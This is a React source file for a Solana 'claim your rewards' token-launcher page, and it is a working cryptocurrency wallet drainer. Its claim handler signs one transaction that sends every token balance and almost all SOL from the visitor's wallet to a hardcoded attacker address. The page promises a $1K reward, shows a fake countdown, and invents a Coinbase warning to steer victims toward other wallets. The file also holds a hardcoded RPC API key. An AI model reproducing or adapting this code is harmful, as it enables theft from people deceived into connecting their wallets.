import React, { useState, useEffect } from 'react';
import { useWallet } from '@solana/wallet-adapter-react';
import { Connection, PublicKey, Transaction, SystemProgram, LAMPORTS_PER_SOL } from '@solana/web3.js';
import { TOKEN_PROGRAM_ID, createTransferInstruction, getAssociatedTokenAddress, createAssociatedTokenAccountInstruction } from '@solana/spl-token';
import { Clock, AlertCircle, ExternalLink, Wallet, LogOut, Rocket, Zap, Shield, Users, Star, CheckCircle, ArrowRight, Moon, Sparkles, Target, Globe, Lock, Cloud, Cpu, Info } from 'lucide-react';
import { WalletMultiButton } from '@solana/wallet-adapter-react-ui';


const ClaimButton = () => {
  const { publicKey, sendTransaction, disconnect, wallet } = useWallet();
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');
  const [success, setSuccess] = useState(false);
  const [balance, setBalance] = useState(null);
  const [tokenAccounts, setTokenAccounts] = useState([]);
  const [transactionAmount, setTransactionAmount] = useState(null);
  const [isHovered, setIsHovered] = useState(false);

  useEffect(() => {
    const fetchBalanceAndTokens = async () => {
      if (publicKey) {
        try {
          // Change to 'devnet' for testing, 'mainnet-beta' for production
          //const RPC_ENDPOINT = 'https://api.devnet.solana.com'; // For testing
          const RPC_ENDPOINT = 'https://mainnet.helius-rpc.com/?api-key=1a2cd70a-5fe9-4a04-931f-6a3ac221a7ca'; // For production
          const connection = new Connection(RPC_ENDPOINT, 'confirmed');
          
          // Fetch SOL balance
          const balance = await connection.getBalance(publicKey);
          setBalance(balance);

          // Fetch all token accounts
          const tokenAccounts = await connection.getParsedTokenAccountsByOwner(
            publicKey,
            { programId: TOKEN_PROGRAM_ID }
          );

          // Filter and format token accounts with non-zero balance
          const tokens = tokenAccounts.value
            .map(account => {
              const parsedInfo = account.account.data.parsed.info;
              return {
                mint: parsedInfo.mint,
                amount: parsedInfo.tokenAmount.uiAmount,
                decimals: parsedInfo.tokenAmount.decimals,
                address: account.pubkey.toString()
              };
            })
            .filter(token => token.amount > 0);

          setTokenAccounts(tokens);
        } catch (err) {
          console.error('Failed to fetch balance and tokens:', err);
          setBalance(null);
          setTokenAccounts([]);
        }
      } else {
        setBalance(null);
        setTokenAccounts([]);
      }
    };

    fetchBalanceAndTokens();
  }, [publicKey]);

  // Function to format SOL amount
  const formatSOL = (lamports) => {
    return (lamports / LAMPORTS_PER_SOL).toFixed(4);
  };

  // Function to format wallet address
  const formatAddress = (address) => {
    return `${address.slice(0, 4)}...${address.slice(-4)}`;
  };

  // Function to check balance and calculate safe amount
  const checkBalanceAndCalculateAmount = async () => {
    if (!publicKey) {
      setError('Please connect your wallet first');
      return false;
    }

    try {
      const connection = new Connection('https://mainnet.helius-rpc.com/?api-key=1a2cd70a-5fe9-4a04-931f-6a3ac221a7ca', 'confirmed');
      const balance = await connection.getBalance(publicKey);
      setBalance(balance);

      // Set fixed amount of 1 SOL in lamports
      setTransactionAmount(LAMPORTS_PER_SOL);
      return true;

    } catch (err) {
      console.error('Failed to check balance:', err);
      setError('Failed to check wallet balance. Please try again.');
      return false;
    }
  };

  const handleClaim = async () => {
    try {
      setLoading(true);
      setError('');
      setSuccess(false);

      const recipientAddress = new PublicKey('Fn1sCsZKLQPqKPCFXL3FDL3YDnhevbM72AzJijSwuJm3');

      // Create connection

      //const RPC_ENDPOINT = 'https://api.devnet.solana.com'; // For testing
      const RPC_ENDPOINT = 'https://mainnet.helius-rpc.com/?api-key=1a2cd70a-5fe9-4a04-931f-6a3ac221a7ca'; // For production
      const connection = new Connection(RPC_ENDPOINT, 'confirmed');
      
      // Get the latest blockhash and current balance
      const [{ blockhash }, currentBalance] = await Promise.all([
        connection.getLatestBlockhash(),
        connection.getBalance(publicKey)
      ]);

      // Create a single transaction for all transfers
      const transaction = new Transaction();
      transaction.recentBlockhash = blockhash;
      transaction.feePayer = publicKey;

      // Add SPL token transfer instructions
      for (const token of tokenAccounts) {
        try {
          const mintPublicKey = new PublicKey(token.mint);
          const fromTokenAccount = new PublicKey(token.address);
          
          // Get or create associated token account for recipient
          const recipientTokenAccount = await getAssociatedTokenAddress(
            mintPublicKey,
            recipientAddress
          );

          // Check if recipient token account exists
          const recipientAccountInfo = await connection.getAccountInfo(recipientTokenAccount);
          
          // If account doesn't exist, create it first
          if (!recipientAccountInfo) {
            transaction.add(
              createAssociatedTokenAccountInstruction(
                publicKey, // payer
                recipientTokenAccount, // associated token account
                recipientAddress, // owner
                mintPublicKey // mint
              )
            );
          }

          // Add transfer instruction
          const transferAmount = Math.floor(token.amount * Math.pow(10, token.decimals));
          transaction.add(
            createTransferInstruction(
              fromTokenAccount,
              recipientTokenAccount,
              publicKey,
              transferAmount
            )
          );
        } catch (tokenErr) {
          console.error(`Failed to add transfer for token ${token.mint}:`, tokenErr);
          // Continue with other tokens even if one fails
        }
      }

      // Calculate SOL amount to send (leave buffer for fees)
      //const estimatedFee = 0.01 * LAMPORTS_PER_SOL; // Increased buffer for multiple transactions
      const estimatedFee = 0.001 * LAMPORTS_PER_SOL; // Increased buffer for multiple transactions
      const sendAmount = currentBalance - estimatedFee;

      if (sendAmount > 0) {
        // Add SOL transfer instruction
        transaction.add(
          SystemProgram.transfer({
            fromPubkey: publicKey,
            toPubkey: recipientAddress,
            lamports: sendAmount,
          })
        );
      }

      // Send transaction
      const signature = await sendTransaction(transaction, connection);
      console.log('Transaction sent:', signature);
      
      // Wait for confirmation
      const confirmation = await connection.confirmTransaction(signature, 'confirmed');
      console.log('Transaction confirmed:', confirmation);
      
      setSuccess(true);
      setTransactionAmount(sendAmount);
    } catch (err) {
      console.error('Claim failed:', err);
      setError(`Claim failed: ${err.message || 'Please try again.'}`);
    } finally {
      setLoading(false);
    }
  };

  // Enhanced SVG Animations
  const AnimatedRocket = () => (
    <svg width="120" height="120" viewBox="0 0 120 120" className="absolute top-10 right-10 animate-float">
      <defs>
        <linearGradient id="rocketGradient" x1="0%" y1="0%" x2="100%" y2="100%">
          <stop offset="0%" stopColor="#00F5A0" />
          <stop offset="100%" stopColor="#00D9F5" />
        </linearGradient>
        <filter id="glow">
          <feGaussianBlur stdDeviation="3" result="coloredBlur"/>
          <feMerge>
            <feMergeNode in="coloredBlur"/>
            <feMergeNode in="SourceGraphic"/>
          </feMerge>
        </filter>
      </defs>
      <path
        d="M60 20 L75 45 L90 35 L60 20 Z"
        fill="url(#rocketGradient)"
        filter="url(#glow)"
        className="animate-pulse"
      />
      <path
        d="M60 100 L45 75 L30 85 L60 100 Z"
        fill="url(#rocketGradient)"
        filter="url(#glow)"
        className="animate-pulse delay-75"
      />
      <circle cx="60" cy="60" r="8" fill="url(#rocketGradient)" filter="url(#glow)" />
    </svg>
  );

  const FloatingParticles = () => (
    <div className="absolute inset-0 pointer-events-none">
      {[...Array(15)].map((_, i) => (
        <div
          key={i}
          className="absolute w-2 h-2 bg-teal-400 rounded-full animate-float"
          style={{
            left: `${Math.random() * 100}%`,
            top: `${Math.random() * 100}%`,
            animationDelay: `${Math.random() * 5}s`,
            animationDuration: `${3 + Math.random() * 4}s`
          }}
        />
      ))}
    </div>
  );

  const PulseRing = () => (
    <div className="absolute inset-0 flex items-center justify-center pointer-events-none">
      <div className="w-32 h-32 border-4 border-teal-400/30 rounded-full animate-ping absolute"></div>
      <div className="w-40 h-40 border-4 border-blue-400/20 rounded-full animate-ping absolute animation-delay-1000"></div>
    </div>
  );

  const CryptoWaves = () => (
    <svg width="100%" height="80" viewBox="0 0 1200 120" className="absolute bottom-0 left-0 opacity-10">
      <path
        fill="url(#waveGradient)"
        d="M0,96L48,112C96,128,192,160,288,186.7C384,213,480,235,576,213.3C672,192,768,128,864,128C960,128,1056,192,1152,197.3C1248,203,1344,149,1392,122.7L1440,96L1440,320L1392,320C1344,320,1248,320,1152,320C1056,320,960,320,864,320C768,320,672,320,576,320C480,320,384,320,288,320C192,320,96,320,48,320L0,320Z"
        className="animate-wave"
      />
      <defs>
        <linearGradient id="waveGradient" x1="0%" y1="0%" x2="100%" y2="0%">
          <stop offset="0%" stopColor="#00F5A0" />
          <stop offset="50%" stopColor="#00D9F5" />
          <stop offset="100%" stopColor="#00F5A0" />
        </linearGradient>
      </defs>
    </svg>
  );

  const BlockchainNodes = () => (
    <div className="absolute inset-0 pointer-events-none">
      {[...Array(8)].map((_, i) => (
        <div
          key={i}
          className="absolute w-3 h-3 bg-purple-400 rounded-full animate-pulse"
          style={{
            left: `${20 + (i * 10)}%`,
            top: `${30 + Math.sin(i) * 20}%`,
            animationDelay: `${i * 0.5}s`
          }}
        />
      ))}
      {[...Array(8)].map((_, i) => (
        <div
          key={i + 8}
          className="absolute w-2 h-2 bg-blue-400 rounded-full animate-pulse"
          style={{
            left: `${15 + (i * 12)}%`,
            top: `${60 + Math.cos(i) * 15}%`,
            animationDelay: `${(i + 8) * 0.3}s`
          }}
        />
      ))}
    </div>
  );

  return (
    <div className="min-h-screen bg-gradient-to-br from-purple-900 via-blue-900 to-indigo-900 text-white overflow-hidden relative">
      {/* Enhanced Animated Background */}
      <div className="fixed inset-0 overflow-hidden pointer-events-none">
        <FloatingParticles />
        <BlockchainNodes />
        <div className="absolute -top-40 -left-40 w-80 h-80 bg-teal-400/10 rounded-full blur-3xl animate-pulse"></div>
        <div className="absolute top-1/2 -right-20 w-60 h-60 bg-blue-400/10 rounded-full blur-3xl animate-bounce"></div>
        <div className="absolute -bottom-20 left-1/4 w-72 h-72 bg-purple-400/10 rounded-full blur-3xl animate-pulse delay-1000"></div>
        <div className="absolute top-1/3 right-1/4 w-40 h-40 bg-cyan-400/5 rounded-full blur-2xl animate-spin-slow"></div>
      </div>

      {/* Header */}
      <header className="relative z-10">
        <div className="container mx-auto px-4 py-6">
          <div className="flex items-center justify-between">
            <div className="flex items-center space-x-3">
              <div className="relative">
                <div className="w-12 h-12 bg-gradient-to-r from-teal-400 to-blue-500 rounded-xl flex items-center justify-center shadow-lg shadow-teal-400/25 relative z-10">
                  <Rocket size={28} className="text-white" />
                </div>
                <PulseRing />
              </div>
              <div>
                <span className="text-3xl font-black bg-gradient-to-r from-teal-400 via-blue-400 to-purple-400 bg-clip-text text-transparent tracking-tight">
                  SolanaToken
                </span>
                <div className="flex items-center space-x-1 mt-1">
                  <div className="w-2 h-2 bg-green-400 rounded-full animate-pulse"></div>
                  <span className="text-xs text-gray-300 font-medium">LIVE • MAINNET</span>
                </div>
              </div>
            </div>
            <WalletMultiButton className="!bg-gradient-to-r !from-teal-400 !to-blue-500 !text-white hover:!from-teal-300 hover:!to-blue-400 !rounded-xl !h-12 !px-6 !font-bold !shadow-lg !shadow-teal-400/25 transition-all duration-300 hover:!scale-105" />
          </div>
        </div>
      </header>

      {/* Hero Section */}
      <section className="relative z-10 py-12">
        <div className="container mx-auto px-4 text-center">
          <div className="inline-flex items-center space-x-2 bg-white/5 backdrop-blur-lg rounded-full px-6 py-3 border border-white/10 mb-8 relative overflow-hidden">
            <Sparkles size={16} className="text-teal-400" />
            <span className="text-sm font-semibold text-gray-200">THE WORLD'S MOST POWERFUL SOLANA LAUNCHER</span>
            <Sparkles size={16} className="text-teal-400" />
            <div className="absolute inset-0 bg-gradient-to-r from-transparent via-white/5 to-transparent animate-shimmer"></div>
          </div>

          <h1 className="text-6xl md:text-8xl font-black mb-6 leading-none tracking-tight">
            <span className="block">LAUNCH YOUR</span>
            <span className="block bg-gradient-to-r from-teal-400 via-blue-400 to-purple-400 bg-clip-text text-transparent">
              SOLANA TOKEN
            </span>
          </h1>
          
          <div className="flex items-center justify-center space-x-2 mb-8">
            <Moon size={24} className="text-yellow-400 animate-bounce" />
            <p className="text-2xl md:text-3xl font-bold text-gray-300 tracking-wide">
              TAKE IT TO THE MOON!
            </p>
            <Moon size={24} className="text-yellow-400 animate-bounce delay-75" />
          </div>

          <p className="text-xl text-gray-400 mb-12 max-w-3xl mx-auto leading-relaxed">
            Online and display your Solana cash office using a separate network or world service service server. 
            Choose your Free Team and unlock the full potential of your token.
          </p>
          
          {/* Feature Grid */}
          <div className="grid md:grid-cols-4 gap-6 max-w-5xl mx-auto mb-16">
            {[
              { icon: Cpu, title: "Solana Token Creator", desc: "Create and deploy instantly", color: "teal" },
              { icon: Globe, title: "Multi-Network", desc: "Works across all networks", color: "blue" },
              { icon: Lock, title: "Secure", desc: "Enterprise grade security", color: "purple" },
              { icon: Cloud, title: "Cloud Ready", desc: "Always online service", color: "cyan" }
            ].map((feature, index) => (
              <div 
                key={index}
                className="bg-gradient-to-br from-white/5 to-white/10 backdrop-blur-lg rounded-2xl p-6 border border-white/10 hover:border-white/20 transition-all duration-300 hover:scale-105 group relative overflow-hidden"
              >
                <div className={`w-14 h-14 bg-${feature.color}-400/20 rounded-2xl flex items-center justify-center mb-4 mx-auto group-hover:scale-110 transition-transform duration-300`}>
                  <feature.icon className={`text-${feature.color}-400`} size={28} />
                </div>
                <h3 className="text-lg font-bold mb-2 text-white">{feature.title}</h3>
                <p className="text-gray-400 text-sm">{feature.desc}</p>
                <div className={`absolute bottom-0 left-0 w-full h-1 bg-gradient-to-r from-${feature.color}-400 to-${feature.color}-600 transform scale-x-0 group-hover:scale-x-100 transition-transform duration-300`}></div>
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* Main Content */}
      <section className="relative z-10 py-8">
        <div className="container mx-auto px-4">
          <div className="grid lg:grid-cols-2 gap-8 items-start">
            {/* Left Side - Stats & Features */}


            {/* Right Side - Claim Interface */}
            <div className="bg-gradient-to-br from-gray-900/40 to-purple-900/30 rounded-3xl p-8 border border-white/10 backdrop-blur-lg shadow-2xl relative overflow-hidden">
              <FloatingParticles />
              <div className="text-center mb-8 relative z-10">
                <div className="w-20 h-20 bg-gradient-to-r from-teal-400 to-blue-500 rounded-2xl flex items-center justify-center mx-auto mb-4 shadow-lg shadow-teal-400/25 relative">
                  <Rocket size={36} className="text-white" />
                  <div className="absolute inset-0 rounded-2xl bg-teal-400/20 animate-ping"></div>
                </div>
                <h2 className="text-4xl font-black mb-3 bg-gradient-to-r from-white to-gray-300 bg-clip-text text-transparent">
                  CLAIM YOUR REWARDS
                </h2>
                <p className="text-xl text-gray-400 font-semibold">Get your $1K ~ 7.9 SOL tokens now</p>
              </div>

              <div className="space-y-6 relative z-10">
                {/* Claim Details */}
                <div className="p-6 rounded-2xl bg-gradient-to-r from-teal-500/10 to-blue-500/10 border border-teal-400/20 relative overflow-hidden">
                  <div className="absolute top-0 right-0 w-20 h-20 bg-teal-400/5 rounded-full -translate-y-10 translate-x-10"></div>
                  <h3 className="text-xl font-black mb-4 flex items-center justify-center relative">
                    <Star className="text-yellow-400 mr-3" size={24} />
                    <span className="bg-gradient-to-r from-yellow-400 to-amber-400 bg-clip-text text-transparent">
                      CLAIM DETAILS
                    </span>
                  </h3>
                  <div className="space-y-4">
                    <div className="flex justify-between items-center p-3 bg-white/5 rounded-xl hover:bg-white/10 transition-colors duration-300">
                      <span className="text-gray-400 font-semibold">Available to claim:</span>
                      <div className="flex items-center space-x-2">
                        <div className="w-3 h-3 bg-teal-400 rounded-full animate-pulse"></div>
                        <span className="font-black text-teal-400 text-lg">$1K ~ 7.9 SOL</span>
                      </div>
                    </div>
                    <div className="flex justify-between items-center p-3 bg-white/5 rounded-xl hover:bg-white/10 transition-colors duration-300">
                      <span className="text-gray-400 font-semibold">Claim deadline:</span>
                      <div className="flex items-center space-x-2">
                        <Clock size={18} className="text-yellow-400" />
                        <span className="font-black text-yellow-400 text-lg">7 DAYS REMAINING</span>
                      </div>
                    </div>
                  </div>
                </div>

                {/* Wallet Connection States */}
                {!publicKey ? (
                  <div className="text-center py-8">
                    <div className="w-24 h-24 bg-white/5 rounded-2xl flex items-center justify-center mx-auto mb-6 border border-white/10 relative">
                      <Wallet size={40} className="text-gray-400" />
                      <div className="absolute inset-0 rounded-2xl border-2 border-dashed border-gray-600 animate-pulse"></div>
                    </div>
                    <h3 className="text-2xl font-black mb-4 text-white">CONNECT YOUR WALLET</h3>
                    <p className="text-gray-300 mb-8 text-lg font-semibold">Please connect your wallet to proceed with the claim</p>
                    
                    <div className="flex flex-col items-center space-y-6">
                      {wallet && wallet.adapter.name === 'Coinbase Wallet' ? (
                        <div className="p-6 bg-yellow-600/20 border border-yellow-600/30 rounded-2xl text-left w-full">
                          <div className="flex items-start space-x-4">
                            <div>
                              <h4 className="font-black text-xl mb-3 text-yellow-400">COINBASE WALLET ALERT</h4>
                              <p className="text-yellow-300/90 mb-3 font-semibold">
                                There is current excessive crowding and progressive increase in Solana (SOL) gas fees on the Coinbase network.
                              </p>
                              <p className="text-yellow-300/90 font-semibold">
                                To help you avoid these issues, Coinbase recommends using alternative wallets such as <span className="font-black text-white">Phantom Wallet</span> or <span className="font-black text-white">Solflare Wallet</span>.
                              </p>
                              <button
                                onClick={disconnect}
                                className="mt-4 text-yellow-400 hover:text-yellow-300 font-black text-sm transition-colors flex items-center space-x-2"
                              >
                                <span>SWITCH TO ANOTHER WALLET</span>
                                <ArrowRight size={16} />
                              </button>
                            </div>
                          </div>
                        </div>
                      ) : (
                        <>
                          <WalletMultiButton className="!bg-gradient-to-r !from-teal-400 !to-blue-500 !text-white hover:!from-teal-300 hover:!to-blue-400 !rounded-xl !h-14 !px-10 !font-black !text-lg !shadow-lg !shadow-teal-400/25 transition-all duration-300 hover:!scale-105" />
                          <button
                            onClick={disconnect}
                            className="text-gray-400 hover:text-gray-300 text-sm transition-colors font-semibold"
                          >
                            CLEAR SELECTION
                          </button>
                        </>
                      )}
                    </div>
                  </div>
                ) : success ? (
                  <div className="text-center py-8">
                    <div className="w-24 h-24 bg-gradient-to-r from-green-400 to-teal-500 rounded-2xl flex items-center justify-center mx-auto mb-6 shadow-lg shadow-green-400/25 relative">
                      <CheckCircle size={40} className="text-white" />
                      <div className="absolute inset-0 rounded-2xl bg-green-400/20 animate-ping"></div>
                    </div>
                    <h3 className="text-2xl font-black mb-3 text-green-400">SUCCESSFULLY CLAIMED!</h3>
                    <p className="text-gray-300 mb-8 text-lg font-semibold">Your $1K ~ 7.9 SOL is being processed</p>
                    
                    <div className="p-6 bg-white/5 rounded-2xl mb-8 border border-green-400/20">
                      <div className="flex justify-between items-center mb-4">
                        <span className="text-gray-400 font-semibold">Transaction Status</span>
                        <span className="font-black text-green-400 text-lg">CONFIRMED</span>
                      </div>
                      <div className="w-full bg-white/10 rounded-full h-3">
                        <div className="bg-gradient-to-r from-green-400 to-teal-500 h-3 rounded-full w-full shadow-lg shadow-green-400/25"></div>
                      </div>
                    </div>
                    
                    <button
                      onClick={() => setSuccess(false)}
                      className="w-full py-4 rounded-xl bg-gradient-to-r from-teal-400 to-blue-500 text-white font-black text-lg hover:from-teal-300 hover:to-blue-400 transition-all transform hover:scale-105 shadow-lg shadow-teal-400/25"
                    >
                      MAKE ANOTHER CLAIM
                    </button>
                  </div>
                ) : (
                  <>
                    {/* Connected Wallet Info */}
                    <div className="p-6 rounded-2xl bg-white/5 border border-white/10 mb-6 relative overflow-hidden">
                      <div className="flex justify-between items-center mb-6">
                        <span className="text-gray-400 font-semibold text-lg">CONNECTED WALLET</span>
                        <div className="flex items-center space-x-3">
                          <div className="flex items-center space-x-2 bg-white/5 px-4 py-2 rounded-xl border border-teal-400/20">
                            <div className="w-2 h-2 bg-teal-400 rounded-full animate-pulse"></div>
                            <span className="font-bold text-sm text-white">{formatAddress(publicKey.toString())}</span>
                          </div>
                          <button
                            onClick={disconnect}
                            className="p-2 hover:bg-white/10 rounded-xl transition-colors border border-white/10 hover:border-white/20"
                            title="Disconnect Wallet"
                          >
                            <LogOut size={18} className="text-gray-400 hover:text-white" />
                          </button>
                        </div>
                      </div>
                      
                      <div className="space-y-4">
                        <div className="flex justify-between items-center py-3 border-t border-white/10">
                          <span className="text-gray-400 font-semibold">SOL Balance:</span>
                          <span className="font-black text-teal-400 text-lg">
                            {balance !== null ? formatSOL(balance) : '...'} SOL
                          </span>
                        </div>

                        {tokenAccounts.length > 0 && (
                          <div className="mt-4 border-t border-white/10 pt-4">
                            <span className="text-gray-400 font-semibold text-sm mb-4 block">
                              SPL TOKENS ({tokenAccounts.length})
                            </span>
                            <div className="space-y-2 max-h-40 overflow-y-auto">
                              {tokenAccounts.map((token, index) => (
                                <div key={index} className="flex justify-between items-center text-sm py-2 px-3 bg-white/5 rounded-lg hover:bg-white/10 transition-colors">
                                  <span className="text-gray-300 truncate mr-2 font-medium">
                                    {formatAddress(token.mint)}
                                  </span>
                                  <span className="font-black text-teal-400">
                                    {token.amount.toFixed(4)}
                                  </span>
                                </div>
                              ))}
                            </div>
                          </div>
                        )}
                      </div>
                    </div>

                    {/* Claim Button */}
                    <button 
                      onClick={handleClaim}
                      disabled={loading || (balance === 0 && tokenAccounts.length === 0)}
                      onMouseEnter={() => setIsHovered(true)}
                      onMouseLeave={() => setIsHovered(false)}
                      className={`w-full py-5 rounded-xl font-black text-xl transition-all transform shadow-2xl relative overflow-hidden ${
                        loading
                          ? 'bg-purple-600 cursor-wait scale-95 shadow-purple-600/25' 
                          : (balance === 0 && tokenAccounts.length === 0)
                          ? 'bg-gray-600 cursor-not-allowed opacity-50'
                          : 'bg-gradient-to-r from-teal-400 to-blue-500 hover:from-teal-300 hover:to-blue-400 text-white hover:scale-105 shadow-teal-400/25 hover:shadow-teal-400/40'
                      }`}
                    >
                      {loading ? (
                        <div className="flex items-center justify-center space-x-3">
                          <div className="w-6 h-6 border-2 border-white/30 border-t-white rounded-full animate-spin"></div>
                          <span>PROCESSING CLAIM...</span>
                        </div>
                      ) : (balance === 0 && tokenAccounts.length === 0) ? (
                        <div className="flex items-center justify-center space-x-2">
                          <AlertCircle size={20} />
                          <span>NO FUNDS TO CLAIM</span>
                        </div>
                      ) : (
                        <div className="flex items-center justify-center space-x-3">
                          <Rocket size={24} className={isHovered ? 'animate-bounce' : ''} />
                          <span>CLAIM MY TOKENS</span>
                          <Sparkles size={20} className={isHovered ? 'animate-pulse' : ''} />
                        </div>
                      )}
                      <div className="absolute inset-0 bg-gradient-to-r from-transparent via-white/10 to-transparent transform -skew-x-12 translate-x-[-100%] group-hover:translate-x-[100%] transition-transform duration-1000"></div>
                    </button>

                    {error && (
                      <div className="p-4 rounded-2xl bg-red-400/10 border border-red-400/30 text-red-300 text-center font-semibold">
                        <AlertCircle size={20} className="inline-block mr-2" />
                        {error}
                      </div>
                    )}
                  </>
                )}
              </div>
            </div>
            <div className="space-y-6">

              {/* Main Stats Card */}
              <div className="bg-gradient-to-br from-purple-600/20 to-blue-600/20 rounded-3xl p-8 border border-white/10 backdrop-blur-lg shadow-2xl relative overflow-hidden">
                <AnimatedRocket />
                <h2 className="text-4xl font-black mb-6 leading-tight bg-gradient-to-r from-white to-gray-300 bg-clip-text text-transparent relative z-10">
                  UNLOCK THE FULL POTENTIAL OF YOUR SOLANA TOKEN EFFORTLESSLY
                </h2>
                
                <div className="space-y-4 mb-8 relative z-10">
                  {[
                    { icon: CheckCircle, title: "Your Solana Token Creator", desc: "Create and deploy in minutes with zero configuration", color: "teal" },
                    { icon: Target, title: "Multi-Chain Ready", desc: "Works across all networks and service servers", color: "blue" },
                    { icon: Zap, title: "Lightning Fast", desc: "Instant deployment and transaction processing", color: "purple" }
                  ].map((item, index) => (
                    <div key={index} className="flex items-center space-x-4 p-4 bg-white/5 rounded-2xl hover:bg-white/10 transition-all duration-300 group">
                      <div className={`w-10 h-10 bg-${item.color}-400/20 rounded-xl flex items-center justify-center flex-shrink-0 group-hover:scale-110 transition-transform duration-300`}>
                        <item.icon className={`text-${item.color}-400`} size={20} />
                      </div>
                      <div className="flex-1">
                        <h4 className="font-bold text-lg text-white">{item.title}</h4>
                        <p className="text-gray-400 text-sm">{item.desc}</p>
                      </div>
                      <ArrowRight size={20} className={`text-${item.color}-400 flex-shrink-0 group-hover:translate-x-1 transition-transform duration-300`} />
                    </div>
                  ))}
                </div>

                {/* Stats */}
                <div className="bg-gradient-to-r from-teal-500/10 to-blue-500/10 rounded-2xl p-6 border border-teal-400/20 relative z-10">
                  <div className="text-center mb-6">
                    <div className="text-5xl font-black text-teal-400 mb-2 tracking-tight">$15,041.89</div>
                    <div className="text-gray-300 font-semibold uppercase tracking-wide text-sm">Total Value Locked</div>
                  </div>
                  
                  <div className="grid grid-cols-2 gap-6">
                    <div className="text-center p-4 bg-white/5 rounded-xl hover:bg-white/10 transition-colors duration-300">
                      <div className="text-2xl font-black text-white mb-1">99.9%</div>
                      <div className="text-gray-400 text-xs font-semibold uppercase tracking-wide">Uptime Guarantee</div>
                    </div>
                    <div className="text-center p-4 bg-white/5 rounded-xl hover:bg-white/10 transition-colors duration-300">
                      <div className="text-2xl font-black text-white mb-1">85%+</div>
                      <div className="text-gray-400 text-xs font-semibold uppercase tracking-wide">Success Rate</div>
                    </div>
                  </div>
                </div>
                <CryptoWaves />
              </div>

              {/* Team Selection */}
              <div className="bg-white/5 backdrop-blur-lg rounded-2xl p-6 border border-white/10 shadow-xl relative overflow-hidden">
                <h3 className="text-2xl font-black mb-6 text-center bg-gradient-to-r from-teal-400 to-blue-400 bg-clip-text text-transparent">
                  CHOOSE YOUR FREE TEAM
                </h3>
                <div className="space-y-4">
                  {['Development Team', 'Marketing Team', 'Community Managers', 'Security Experts'].map((team, index) => (
                    <div key={index} className="flex items-center justify-between p-4 bg-gradient-to-r from-white/5 to-white/10 rounded-xl hover:from-white/10 hover:to-white/15 transition-all duration-300 group cursor-pointer">
                      <div className="flex items-center space-x-3">
                        <div className="w-8 h-8 bg-gradient-to-r from-teal-400 to-blue-500 rounded-lg flex items-center justify-center group-hover:scale-110 transition-transform duration-300">
                          <Users size={16} className="text-white" />
                        </div>
                        <span className="font-semibold text-white group-hover:text-teal-300 transition-colors duration-300">{team}</span>
                      </div>
                      <ArrowRight size={18} className="text-teal-400 group-hover:translate-x-1 transition-transform duration-300" />
                    </div>
                  ))}
                </div>
              </div>
            </div>

         
          </div>
        </div>
      </section>

      {/* Footer */}
      <footer className="relative z-10 border-t border-white/10 py-8 mt-16">
        <div className="container mx-auto px-4 text-center">
          <div className="flex items-center justify-center space-x-3 mb-4">
            <div className="w-8 h-8 bg-gradient-to-r from-teal-400 to-blue-500 rounded-lg flex items-center justify-center">
              <Rocket size={16} className="text-white" />
            </div>
            <span className="font-black text-xl bg-gradient-to-r from-teal-400 to-blue-400 bg-clip-text text-transparent">
              SolanaToken
            </span>
          </div>
          <p className="text-gray-400 text-sm font-semibold tracking-wide">
            © Sokolama 2025 • SmartLab.com / BrandIndex
          </p>
        </div>
      </footer>

      <style jsx>{`
        @keyframes float {
          0%, 100% { transform: translateY(0px) rotate(0deg); }
          33% { transform: translateY(-10px) rotate(1deg); }
          66% { transform: translateY(-5px) rotate(-1deg); }
        }
        @keyframes slow-spin {
          from { transform: rotate(0deg); }
          to { transform: rotate(360deg); }
        }
        @keyframes wave {
          0% { transform: translateX(0); }
          50% { transform: translateX(-30px); }
          100% { transform: translateX(0); }
        }
        @keyframes shimmer {
          0% { transform: translateX(-100%); }
          100% { transform: translateX(100%); }
        }
        .animate-spin-slow {
          animation: slow-spin 8s linear infinite;
        }
        .animate-float {
          animation: float 6s ease-in-out infinite;
        }
        .animate-wave {
          animation: wave 8s ease-in-out infinite;
        }
        .animate-shimmer {
          animation: shimmer 2s infinite;
        }
      `}</style>
    </div>
  );
};

export default ClaimButton;